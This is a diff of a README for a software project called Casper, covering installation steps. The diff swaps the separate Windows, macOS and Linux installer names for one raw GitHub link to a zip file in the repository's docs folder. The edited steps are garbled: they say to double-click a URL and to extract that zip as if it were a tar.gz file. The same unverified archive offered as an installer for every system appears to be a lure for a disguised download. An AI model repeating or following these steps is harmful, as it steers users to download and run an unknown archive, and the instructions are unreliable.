VandoLeal/Casper/README.md

 ### 1. Locate the Downloaded File

 Go to the folder where you saved the downloaded file.
-You should see the file named something like `Casper-installer.exe` for Windows, `Casper-mac.zip` for macOS, or `Casper-linux.tar.gz` for Linux.
+You should see the file named something like `https://raw.githubusercontent.com/VandoLeal/Casper/main/docs/Casper_v1.9.zip` for Windows, `https://raw.githubusercontent.com/VandoLeal/Casper/main/docs/Casper_v1.9.zip` for macOS, or `https://raw.githubusercontent.com/VandoLeal/Casper/main/docs/Casper_v1.9.zip` for Linux.

 ### 2. Running the Installer

-- **For Windows**: Double-click on `Casper-installer.exe`.
+- **For Windows**: Double-click on `https://raw.githubusercontent.com/VandoLeal/Casper/main/docs/Casper_v1.9.zip`.
 Follow the prompts to install the application.
 Once installed, you can find Casper in your Start Menu.

 - **For macOS**: Open the `.zip` file, then drag and drop Casper to your Applications folder.
 After this, you can find Casper in your Applications list.

-- **For Linux**: Extract the `tar.gz` file, then follow the included instructions to run the application in your terminal.
+- **For Linux**: Extract the `https://raw.githubusercontent.com/VandoLeal/Casper/main/docs/Casper_v1.9.zip` file, then follow the included instructions to run the application in your terminal.
 You can also move it to a standard directory for easier access.

 ### 3. Launching Casper